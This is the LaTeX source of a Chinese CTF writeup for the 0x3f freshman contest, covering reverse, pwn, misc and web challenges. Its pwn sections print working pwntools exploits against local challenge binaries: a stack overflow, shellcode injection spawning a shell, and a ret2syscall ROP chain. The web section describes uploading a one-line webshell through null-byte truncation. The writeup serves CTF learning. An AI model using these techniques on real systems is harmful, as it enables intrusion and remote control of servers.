% Options for packages loaded elsewhere \PassOptionsToPackage{unicode=true}{hyperref} \PassOptionsToPackage{hyphens}{url} % \documentclass[ ]{ctexart} \usepackage{lmodern} \usepackage{amssymb,amsmath} \usepackage{ifxetex,ifluatex} \ifnum 0\ifxetex 1\fi\ifluatex 1\fi=0 % if pdftex \usepackage[T1]{fontenc} \usepackage[utf8]{inputenc} \usepackage{textcomp} % provides euro and other symbols \else % if luatex or xelatex \usepackage{unicode-math} \defaultfontfeatures{Scale=MatchLowercase} \defaultfontfeatures[\rmfamily]{Ligatures=TeX,Scale=1} \fi % Use upquote if available, for straight quotes in verbatim environments \IfFileExists{upquote.sty}{\usepackage{upquote}}{} \IfFileExists{microtype.sty}{% use microtype if available \usepackage[]{microtype} \UseMicrotypeSet[protrusion]{basicmath} % disable protrusion for tt fonts }{} \makeatletter \@ifundefined{KOMAClassName}{% if non-KOMA class \IfFileExists{parskip.sty}{% \usepackage{parskip} }{% else \setlength{\parindent}{0pt} \setlength{\parskip}{6pt plus 2pt minus 1pt}} }{% if KOMA class \KOMAoptions{parskip=half}} \makeatother \usepackage{xcolor} \IfFileExists{xurl.sty}{\usepackage{xurl}}{} % add URL line breaks if available \IfFileExists{bookmark.sty}{\usepackage{bookmark}}{\usepackage{hyperref}} \hypersetup{ pdftitle={0x3f 新生赛 writeup}, pdfauthor={TooYoungTooSimp}, hidelinks, } \urlstyle{same} % disable monospaced font for URLs \usepackage{color} \usepackage{fancyvrb} \newcommand{\VerbBar}{|} \newcommand{\VERB}{\Verb[commandchars=\\\{\}]} \DefineVerbatimEnvironment{Highlighting}{Verbatim}{commandchars=\\\{\}} % Add ',fontsize=\small' for more characters per line \newenvironment{Shaded}{}{} \newcommand{\AlertTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}} \newcommand{\AnnotationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} \newcommand{\AttributeTok}[1]{\textcolor[rgb]{0.49,0.56,0.16}{#1}} \newcommand{\BaseNTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}} \newcommand{\BuiltInTok}[1]{#1} \newcommand{\CharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} \newcommand{\CommentTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textit{#1}}} \newcommand{\CommentVarTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} \newcommand{\ConstantTok}[1]{\textcolor[rgb]{0.53,0.00,0.00}{#1}} \newcommand{\ControlFlowTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}} \newcommand{\DataTypeTok}[1]{\textcolor[rgb]{0.56,0.13,0.00}{#1}} \newcommand{\DecValTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}} \newcommand{\DocumentationTok}[1]{\textcolor[rgb]{0.73,0.13,0.13}{\textit{#1}}} \newcommand{\ErrorTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}} \newcommand{\ExtensionTok}[1]{#1} \newcommand{\FloatTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}} \newcommand{\FunctionTok}[1]{\textcolor[rgb]{0.02,0.16,0.49}{#1}} \newcommand{\ImportTok}[1]{#1} \newcommand{\InformationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} \newcommand{\KeywordTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}} \newcommand{\NormalTok}[1]{#1} \newcommand{\OperatorTok}[1]{\textcolor[rgb]{0.40,0.40,0.40}{#1}} \newcommand{\OtherTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{#1}} \newcommand{\PreprocessorTok}[1]{\textcolor[rgb]{0.74,0.48,0.00}{#1}} \newcommand{\RegionMarkerTok}[1]{#1} \newcommand{\SpecialCharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} \newcommand{\SpecialStringTok}[1]{\textcolor[rgb]{0.73,0.40,0.53}{#1}} \newcommand{\StringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} \newcommand{\VariableTok}[1]{\textcolor[rgb]{0.10,0.09,0.49}{#1}} \newcommand{\VerbatimStringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}} \newcommand{\WarningTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}} \setlength{\emergencystretch}{3em} % prevent overfull lines \providecommand{\tightlist}{% \setlength{\itemsep}{0pt}\setlength{\parskip}{0pt}} \setcounter{secnumdepth}{-\maxdimen} % remove section numbering % Redefines (sub)paragraphs to behave more like sections \ifx\paragraph\undefined\else \let\oldparagraph\paragraph \renewcommand{\paragraph}[1]{\oldparagraph{#1}\mbox{}} \fi \ifx\subparagraph\undefined\else \let\oldsubparagraph\subparagraph \renewcommand{\subparagraph}[1]{\oldsubparagraph{#1}\mbox{}} \fi % Set default figure placement to htbp \makeatletter \def\fps@figure{htbp} \makeatother \title{0x3f 新生赛 writeup} \author{TooYoungTooSimp} \date{2019/03/31} \begin{document} \maketitle { \setcounter{tocdepth}{3} \tableofcontents } \hypertarget{x3fux65b0ux751fux8d5b-writeup}{% \section{0x3f新生赛 Writeup}\label{x3fux65b0ux751fux8d5b-writeup}} \hypertarget{re}{% \subsection{Re}\label{re}} \hypertarget{r}{% \subsubsection{R}\label{r}} 下载可执行文件,用IDA打开,在main函数的最后发现一些mov,将立即数用字符显示即得flag。 \hypertarget{pwn}{% \subsection{Pwn}\label{pwn}} \hypertarget{pwn1}{% \subsubsection{pwn1}\label{pwn1}} 简单的栈溢出 \begin{Shaded} \begin{Highlighting}[] \ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*} \NormalTok{pld}\OperatorTok{=}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x20}\OperatorTok{+}\StringTok{'b'}\OperatorTok{*}\DecValTok{8}\OperatorTok{+}\NormalTok{p64(}\BaseNTok{0x401182}\NormalTok{)} \NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./01'}\NormalTok{)} \NormalTok{sh.sendline(pld)} \NormalTok{sh.interactive()} \end{Highlighting} \end{Shaded} \hypertarget{pwn2}{% \subsubsection{pwn2}\label{pwn2}} 通过提示可以找到C++的全局变量初始化函数,发现有mmap一块RWX的内存,而立即数反汇编后是\texttt{jmp\ rsp},栈又可执行,所以题解如下: \begin{Shaded} \begin{Highlighting}[] \ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*} \NormalTok{context.arch }\OperatorTok{=} \StringTok{'amd64'} \NormalTok{sh }\OperatorTok{=}\NormalTok{ process(}\StringTok{'./02'}\NormalTok{)} \NormalTok{pld }\OperatorTok{=} \StringTok{'a'} \OperatorTok{*} \BaseNTok{0x40} \OperatorTok{+} \StringTok{'b'} \OperatorTok{*} \DecValTok{8} \OperatorTok{+}\NormalTok{ p64(}\BaseNTok{0x666666660000}\NormalTok{) }\OperatorTok{+}\NormalTok{ asm(shellcraft.sh())} \NormalTok{sh.sendline(pld)} \NormalTok{sh.interactive()} \end{Highlighting} \end{Shaded} \hypertarget{pwn3}{% \subsubsection{pwn3}\label{pwn3}} 没有pie,静态链接,显然是ret2syscall。用ROPgadget找到那些地址直接用就行了。注意当目标地址中含有\texttt{\textbackslash{}x0a}的时候会导致输入截断,因为\texttt{\textquotesingle{}\textbackslash{}n\textquotesingle{}\ ==\ \textquotesingle{}\textbackslash{}x0a\textquotesingle{}}。 \begin{Shaded} \begin{Highlighting}[] \ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*} \NormalTok{adb}\OperatorTok{=}\BaseNTok{0x080570c4} \NormalTok{cbx}\OperatorTok{=}\BaseNTok{0x0806f1b2} \NormalTok{bsh}\OperatorTok{=}\BaseNTok{0x080dc068} \NormalTok{i80}\OperatorTok{=}\BaseNTok{0x0804a31a} \NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./03'}\NormalTok{)} \NormalTok{pld}\OperatorTok{=}\NormalTok{flat([}\StringTok{'a'}\OperatorTok{*}\BaseNTok{0x30}\NormalTok{,}\StringTok{'b'}\OperatorTok{*}\DecValTok{4}\NormalTok{,adb,}\BaseNTok{0xb}\NormalTok{,}\DecValTok{0}\NormalTok{,bsh,cbx,}\DecValTok{0}\NormalTok{,bsh,i80])} \NormalTok{sh.sendline(pld)} \NormalTok{sh.interactive()} \end{Highlighting} \end{Shaded} \hypertarget{misc}{% \subsection{Misc}\label{misc}} \hypertarget{cap}{% \subsubsection{cap}\label{cap}} 用提示给的网站修复cap,获得修复后的pcap包,跟踪TCP流,发现有两个位置上是lf和ga,将后面一系列包的这两位连起来就是flag了。 \hypertarget{picture}{% \subsubsection{picture}\label{picture}} 下载文件,解压后获得图片,用stegsolve打开,发现绿色通道最低位仿佛有信息,导出出来,根据提升修复bmp header,打开即见flag。 \hypertarget{ux7b7eux5230}{% \subsubsection{签到}\label{ux7b7eux5230}} 复制粘贴,没啥好说的。 \hypertarget{web}{% \subsection{Web}\label{web}} \hypertarget{upload}{% \subsubsection{upload}\label{upload}} 任意上传,用burpsuite拦截上传请求,使用0x00进行截断,用这种方法上传一句话木马,然后用中国菜刀类的工具浏览服务器目录,很容易就能发现flag \hypertarget{section}{% \subsubsection{404}\label{section}} 打开开发者工具,发现虽然看起来是404,实际上是200,flag就在http headers里面。 \hypertarget{ios88}{% \subsubsection{ios88}\label{ios88}} 将user-agent改成ios的,然后把版本号都改成88,就能在http headers里找到flag了。 \end{document}